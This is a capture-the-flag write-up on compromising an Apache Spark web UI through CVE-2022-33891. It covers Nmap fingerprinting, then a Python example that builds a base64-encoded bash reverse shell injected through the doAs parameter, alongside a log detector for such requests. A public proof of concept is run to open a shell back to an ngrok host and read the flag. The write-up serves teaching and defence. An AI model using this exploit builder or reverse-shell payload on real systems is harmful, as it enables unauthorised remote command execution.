Fetch The Flag 2023 Sparky Writeup

Published: October 28, 2025, updated: October 28, 2025

This is a writeup for the Fetch The Flag 2023 Sparky challenge.

Challenge notes

Alright sparky, here’s another web application test for you. We’re running this in prod but we’ve given you a separate dev instance to test. No source code, no inside info. Just pwn and profit and tell us how you did it!

Press the Start button on the top-right to begin this challenge.

Connect with:

http://challenge.ctf.games:31904/

Nmap

I use Nmap to fingerprint the server:

nmap \
    -Pn \
    -p31904 \
    --script=+http-title.nse \
    --script=+http-server-header.nse \
    challenge.ctf.games

Nmap prints the following:

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-28 17:24 JST
Nmap scan report for challenge.ctf.games (34.123.6.222)
Host is up (0.15s latency).
rDNS record for 34.123.6.222: 222.6.123.34.bc.googleusercontent.com

PORT      STATE SERVICE
31904/tcp open  unknown
|_http-title: Spark Master at spark://0.0.0.0:7077
|_http-server-header: Jetty(9.4.36.v20210114)

Nmap done: 1 IP address (1 host up) scanned in 5.47 seconds

If it runs Jetty, it runs Java. What’s Jetty anyway?

Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. […] 1

Furthermore, Spark Master in the HTTP title means that this runs Apache Spark:

Apache Spark - A Unified engine for large-scale data analytics

Apache Spark is a unified analytics engine for large-scale data processing. It provides high-level APIs in Java, Scala, Python and R, and an optimized engine that supports general execution graphs. […]2

When you visit the site on port 31904, you can see a user interface for observing Spark workers and applications. (The spark://0.0.0.0:7077 address in the page title is the master's RPC endpoint that workers and drivers connect to, not the HTTP port; here the web UI is what is exposed on 31904.)

Spark Master (often written standalone Master) is the resource manager for the Spark Standalone cluster to allocate the resources (CPU, Memory, Disk etc…) among the Spark applications. The resources are used to run the Spark Driver and Executors. 3

Web interface

The machine runs Spark version 3.3.1. The Spark maintainers released version 3.3.1 on 2022-10-25 4.

The bug used here is CVE-2022-33891 5. It is usually filed as an access-control problem, but the impact is a shell command injection: when ACLs are enabled, the web UI's HttpSecurityFilter accepts an arbitrary user name from the client, and resolving that user's groups ends in a shell command built from the name, so the code runs as the user Spark runs as. Note that the advisory lists 3.0.3 and earlier, 3.1.1 to 3.1.2 and 3.2.0 to 3.2.1 as affected and names 3.1.3, 3.2.2 and 3.3.0 as the fixed releases, so on paper a 3.3.1 build should be patched; the challenge instance still falls to the public proof of concept below, so treat the version banner as a hint, not as proof either way. NVD describes the bug as follows:

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name.5
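The request that triggers this, and a check for it on the detection side, as an added example that is not the challenge author's poc.py and not Spark's own code. It uses the publicly documented trigger (the ?doAs= query parameter, whose value reaches a shell-executed `id -Gn` group lookup when spark.acls.enable is true); the function names, the ngrok host and port reused from this writeup, and the sample request lines are constructed for this page.

```python
"""Added example (not the challenge author's poc.py, not Spark's own code):
what the CVE-2022-33891 request looks like and how to spot it in request logs.
Function names and the sample request lines are constructed for this page."""
import base64
import re
from urllib.parse import parse_qs, quote, urlparse


def build_doas_url(base_url: str, command: str) -> str:
    """Build the GET request that triggers the bug.

    With spark.acls.enable=true, HttpSecurityFilter trusts the ?doAs= query
    parameter as the effective user, and the shell-based group lookup for that
    user runs `id -Gn <user>` through a shell. Backticks in the "user name" are
    therefore evaluated. The command is base64-encoded so the payload contains
    no quotes, slashes or redirects that would break the outer shell command.
    """
    b64 = base64.b64encode(command.encode()).decode()
    doas = f"`echo {b64} | base64 -d | bash`"
    return f"{base_url.rstrip('/')}/?doAs={quote(doas, safe='')}"


def reverse_shell_command(host: str, port: int) -> str:
    """Classic bash reverse shell; the kind of command a --revshell PoC injects."""
    return f"bash -i >& /dev/tcp/{host}/{port} 0>&1"


# Shell metacharacters that never belong in a user name.
_SHELL_META = re.compile(r"[`$;|&<>(){}]")


def doas_injection_in_request(target: str) -> bool:
    """Detection side: flag a request target whose doAs value could reach the shell.

    parse_qs percent-decodes, so an encoded backtick (%60) is caught as well
    as a raw one.
    """
    query = urlparse(target).query
    return any(_SHELL_META.search(v) for v in parse_qs(query).get("doAs", []))


# Constructed sample request targets (not taken from the challenge server).
SAMPLE_TARGETS = [
    "/?doAs=alice",
    "/?doAs=%60echo%20aWQ%3D%20%7C%20base64%20-d%20%7C%20bash%60",
    "/jobs/?doAs=bob",
]


def flagged_targets(targets=SAMPLE_TARGETS):
    """Return only the request targets that look like CVE-2022-33891 probes."""
    return [t for t in targets if doas_injection_in_request(t)]


if __name__ == "__main__":
    # Host and port are the ngrok endpoint from this writeup, reused as an assumption.
    url = build_doas_url("http://challenge.ctf.games:31904",
                         reverse_shell_command("0.tcp.jp.ngrok.io", 12884))
    print("exploit URL:", url)
    print("flagged:", flagged_targets())
```

The fix is the upgrade the advisory names (3.1.3, 3.2.2 or 3.3.0 and later) and, until then, keeping the Spark UI off untrusted networks; the detector above is a cheap triage filter for access logs, not a substitute for either.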

Exploit

I’m a script kiddie, so I find an RCE proof of concept exploit for CVE-2022-33891.

I use ngrok and nc to listen for connections. My local port is 5612 and the ngrok remote port is 12884. Here, I launch nc:

nc -v -l 5612

This is how the exploit gives you a reverse shell through the web user interface. The host and port passed to the PoC are the public ngrok endpoint, not the local nc port, so the nc -nvlp line the PoC suggests does not apply here. The [X] Connection aborted error at the end is harmless: the injected command is executed synchronously inside the HTTP request, so no normal response comes back, but the shell still arrives at the listener.

poetry run ./poc.py \
    --url http://challenge.ctf.games \
    --port 31904 \
    --revshell \
    --listeninghost 0.tcp.jp.ngrok.io \
    --listeningport 12884
[*] Reverse shell mode.
[*] Set up your listener by entering the following:
nc -nvlp 12884
[*] When your listener is set up, press enter!
[X] ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))

I search for the flag in the nc listener:

sh: 0: can't access tty; job control turned off
$ cat /flag.txt
flag{1cf5f0f135914e5154a6fe20085b0b7a}
$ ⏎

  1. https://eclipse.dev/jetty/ "The Eclipse Jetty Project"

  2. https://spark.apache.org/docs/latest/index.html "Apache Spark - A Unified engine for large-scale data analytics"

  3. https://stackoverflow.com/a/43944575 "Role of master in Spark standalone cluster"

  4. https://spark.apache.org/news/index.html "Spark News"

  5. https://nvd.nist.gov/vuln/detail/cve-2022-33891 "CVE-2022-33891"
